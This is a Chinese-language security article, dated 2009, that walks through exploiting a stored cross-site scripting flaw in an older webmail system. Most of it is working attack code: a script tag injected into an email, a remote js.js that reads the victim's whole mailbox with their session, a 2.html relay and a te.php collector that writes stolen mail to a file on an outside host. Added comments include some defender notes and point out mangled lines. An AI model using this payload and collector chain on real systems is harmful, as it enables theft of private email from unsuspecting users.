2009-4
3
本文试着从一个攻击的角度,对#邮旧版本系统中的一处持久跨站进行测试利用。寻找跨站漏洞,方法一般比较简单:在网页数据交互的地方,测试过滤字符。常用的关键字符有“’’;:!—“={()}/”,当然也可以用谷歌提供的XSS审计工具RatProxy进行测试。
漏洞描述
在#邮系统,好像其版本标注的是Copyright © 1999 – 2007,新写邮件点击源文件编辑:
输入
<body><script>alert(/xss/)</script> </body> |
,点击发送邮件,接收此邮件时即有弹框。
当然在利用此漏洞时,我们需要远程引用一个JS文件了。修改代码如下:
<body><script src=”http://www.test.com/js.js”> /xss/</script> </body> |
就可以远程调用JS文件。
漏洞利用:
此次漏洞利用流程,利用JavaScript的XMLHttpRequest读取邮件内容并提交。
当用户点击含有恶意代码的邮件时,就执行了植入的JS文件,此文件的作用是:利用当前用户的权限读取所有邮件内容,并通过远程调用http://www.text.com/2.html文件将邮件内容远程提交,从而读取受攻击用户的所有邮件内容。实现代码如下:
js.js 【读取所有邮件内容 远程调用2.html】
// Legacy fallback: when the browser has no native XMLHttpRequest but exposes
// ActiveXObject (old IE), define XMLHttpRequest as a factory that tries the
// MSXML ProgIDs below in order and returns the first one that instantiates.
// NOTE(review): a function declaration nested in an `if` block; how such a
// declaration is hoisted was engine-specific before ES2015, so whether this
// shim takes effect depends on the browser.
if (typeof XMLHttpRequest == "undefined" && window.ActiveXObject) {
function XMLHttpRequest() {
// ProgIDs tried newest-first.
var arrSignatures = ["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.5.0", "MSXML2.XMLHTTP.4.0",
"MSXML2.XMLHTTP.3.0", "MSXML2.XMLHTTP",
"Microsoft.XMLHTTP"];
for (var i=0; i < arrSignatures.length; i++) {
try {
// First ProgID that instantiates is returned and used like a native XHR.
var oRequest = new ActiveXObject(arrSignatures[i]);
return oRequest;
} catch (oError) {
//ignore
// Deliberately swallowed: a missing ProgID just means "try the next one".
}
}
// Reached only when every ProgID failed to instantiate.
throw new Error("MSXML is not installed on your system.");
}
}
// Read step of the payload: issues a synchronous GET against the webmail host
// and returns the raw response body. Because this script was injected through
// the stored XSS it runs inside the webmail origin, so the request is made with
// the victim's own session (the article's "利用当前用户的权限").
// Defender note: this step is defeated by output-encoding mail bodies so that
// <script> is never rendered, and independently by a script-src CSP that does
// not allow the external host the payload is loaded from.
function getServerInfo1() {
var oRequest = new XMLHttpRequest();
// "http://www.邮件地址.com" is a placeholder for the webmail host; the third
// argument `false` makes the request synchronous, so responseText is populated
// by the time send() returns.
oRequest.open("get", "http://www.邮件地址.com", false);
oRequest.send(null);
return oRequest.responseText;
}
// Send step of the payload: fetch the mailbox page, then write an iframe whose
// URL carries the escaped response in the fragment (after '#') to a page on the
// remote host (2.html), which forwards it from there.
// Defender note: a URL fragment is never sent over the wire, so proxy logs on
// the victim side only show a frame load of /2.html from a foreign host inside
// the webmail page — that outbound frame, not the payload, is the detection signal.
var info=getServerInfo1();
// The nested double quotes in this document.write call are mangled as printed;
// the line is kept verbatim from the article.
document.write ("<iframe src="http://www.test.com/2.html#"+escape(info)+"">< /iframe>"); |
2.html 【提交数据】
<html>
<head>
<title>数据提交</title>
</head>
<body>
<script language="javascript">
// Transport flag for Http.post: true when typeof XMLHttpRequest reports
// "object" or ActiveX is available. NOTE(review): in engines where the
// XMLHttpRequest constructor reports typeof "function" this comparison is
// false, so without ActiveX the code falls through to the Java path — confirm
// against the browsers the article targets.
var bXmlHttpSupport = (typeof XMLHttpRequest == "object" || window.ActiveXObject);
// Fallback transport using Java objects exposed to page script (LiveConnect in
// old browsers): POSTs sParams to sURL with a form content type and returns the
// response body as one string. Only reached from Http.post when the XHR flag is
// false and the Java checks there pass.
function httpPost(sURL, sParams) {
var oURL = new java.net.URL(sURL);
var oConnection = oURL.openConnection();
// Two-way connection, caching disabled, form-encoded body.
oConnection.setDoInput(true);
oConnection.setDoOutput(true);
oConnection.setUseCaches(false);
oConnection.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
// Write the already-encoded parameter string as the request body.
var oOutput = new java.io.DataOutputStream(oConnection.getOutputStream());
oOutput.writeBytes(sParams);
oOutput.flush();
oOutput.close();
var sLine = "", sResponseText = "";
// Read the response line by line until readLine() returns null.
var oInput = new java.io.DataInputStream(oConnection.getInputStream());
sLine = oInput.readLine();
while (sLine != null){
// Lines are joined with the literal letter "n" as printed — presumably a
// "\n" escape lost in transcription; verify against the original source.
sResponseText += sLine + "n";
sLine = oInput.readLine();
}
oInput.close();
return sResponseText;
}
/**
 * Appends one URL-encoded name=value pair to a form-encoded parameter string.
 * @param {string} sParams - existing parameter string, possibly empty
 * @param {string} sParamName - parameter name; encoded with encodeURIComponent
 * @param {string} sParamValue - parameter value; encoded with encodeURIComponent
 * @returns {string} sParams followed by the new pair, separated by "&" unless sParams was empty
 */
function addPostParam(sParams, sParamName, sParamValue) {
var sPair = encodeURIComponent(sParamName) + "=" + encodeURIComponent(sParamValue);
// No separator before the very first pair.
var sSeparator = sParams.length > 0 ? "&" : "";
return sParams + sSeparator + sPair;
}
/**
 * Appends one URL-encoded name=value pair to a URL's query string.
 * @param {string} sURL - base URL, with or without an existing "?" query
 * @param {string} sParamName - parameter name; encoded with encodeURIComponent
 * @param {string} sParamValue - parameter value; encoded with encodeURIComponent
 * @returns {string} the URL with the pair appended after "?" (no query yet) or "&"
 */
function addURLParam(sURL, sParamName, sParamValue) {
var sSeparator = "&";
if (sURL.indexOf("?") == -1) {
// First query parameter: start the query string instead of extending it.
sSeparator = "?";
}
var sPair = encodeURIComponent(sParamName) + "=" + encodeURIComponent(sParamValue);
return sURL + sSeparator + sPair;
}
// Same ActiveX fallback as in js.js, minus the "MSXML2.XMLHTTP.6.0" ProgID:
// when no native XMLHttpRequest exists but ActiveXObject does, define a factory
// that returns the first MSXML object that instantiates.
// NOTE(review): function declaration inside an `if` block; its hoisting was
// engine-specific before ES2015, so the shim may or may not take effect.
if (typeof XMLHttpRequest == "undefined" && window.ActiveXObject) {
function XMLHttpRequest() {
var arrSignatures = ["MSXML2.XMLHTTP.5.0", "MSXML2.XMLHTTP.4.0",
"MSXML2.XMLHTTP.3.0", "MSXML2.XMLHTTP",
"Microsoft.XMLHTTP"];
for (var i=0; i < arrSignatures.length; i++) {
try {
var oRequest = new ActiveXObject(arrSignatures[i]);
return oRequest;
} catch (oError) {
//ignore
// A missing ProgID is expected; move on to the next candidate.
}
}
// Every ProgID failed.
throw new Error("MSXML is not installed on your system.");
}
}
// Minimal POST helper with two transports: native/ActiveX XMLHttpRequest when
// bXmlHttpSupport is true, otherwise the Java-based httpPost; either way the
// response body is handed to fnCallback.
var Http = new Object;
Http.post = function (sURL, sParams, fnCallback) {
if (bXmlHttpSupport) {
var oRequest = new XMLHttpRequest();
// Asynchronous request (third argument true); the callback fires at readyState 4.
oRequest.open("post", sURL, true);
oRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
oRequest.onreadystatechange = function () {
if (oRequest.readyState == 4) {
// The HTTP status is not checked, so the callback also runs on error responses.
fnCallback(oRequest.responseText);
}
}
oRequest.send(sParams);
} else if (navigator.javaEnabled() && typeof java != "undefined"
&& typeof java.net != "undefined") {
// Java path is wrapped in a short timeout so it completes asynchronously,
// matching the XHR path's callback shape.
setTimeout(function () {
fnCallback(httpPost(sURL, sParams));
}, 10);
} else {
alert("Your browser doesn't support HTTP requests.");
}
};
// Forwarding step on 2.html: POSTs `data` (the mailbox HTML that arrived in the
// URL fragment) to te.php on the same host, which writes it to a file.
// The fixed "book" parameter and the "Data from server" alert look like
// leftovers from the "Professional JavaScript" example this helper is modelled
// on and play no role in the exfiltration itself.
function getServerInfo(data) {
var sURL = "http://www.test.com/te.php";
var sParams = "";
sParams = addPostParam(sParams, "name", data);
sParams = addPostParam(sParams, "book", "Professional JavaScript");
Http.post(sURL, sParams, function (sData) {
alert("Data from server: " + sData);
});
}
// Entry point of 2.html: the mailbox content arrives in location.hash, set by
// the iframe URL js.js wrote into the webmail page. Everything after the last
// '#' is unescaped and forwarded to te.php.
// Defender note: the fragment never leaves the browser, so the content shows
// up on the wire only in the POST from 2.html to te.php — the webmail side
// sees nothing beyond the frame load of 2.html.
var h = location.hash;
var a = h.split("#");
var b = unescape(a[ a.length-1]);
getServerInfo(b);
</script>
</script></body>
</html> |
te.php 【获取提交数据 写入文件】
< ?php
// Collector endpoint for 2.html: appends the POSTed "name" field (the
// forwarded mailbox HTML) to test.txt next to the script.
// Incident-response note: a collector of this shape keeps every submission
// in a single append-only text file, and the confirmation message prints
// $somecontent back unencoded — no authentication, size limit or validation
// is applied to what is written.
$filename = 'test.txt';
$somecontent=$_POST["name"];
// Only attempts the write when the target already exists and is writable.
if (is_writable($filename)) {
// Append mode, so successive submissions accumulate in the same file.
if (!$handle = fopen($filename, 'a')) {
print "不能打开文件 $filename";
exit;
}
if (!fwrite($handle, $somecontent)) {
print "不能写入到文件 $filename";
exit;
}
print "成功地将 $somecontent 写入到文件$filename";
fclose($handle);
} else {
print "文件 $filename 不可写";
}
?> |
一个邮箱的持久性跨站,就能带来用户的邮件信息的泄露,当然还有别的利用方法。

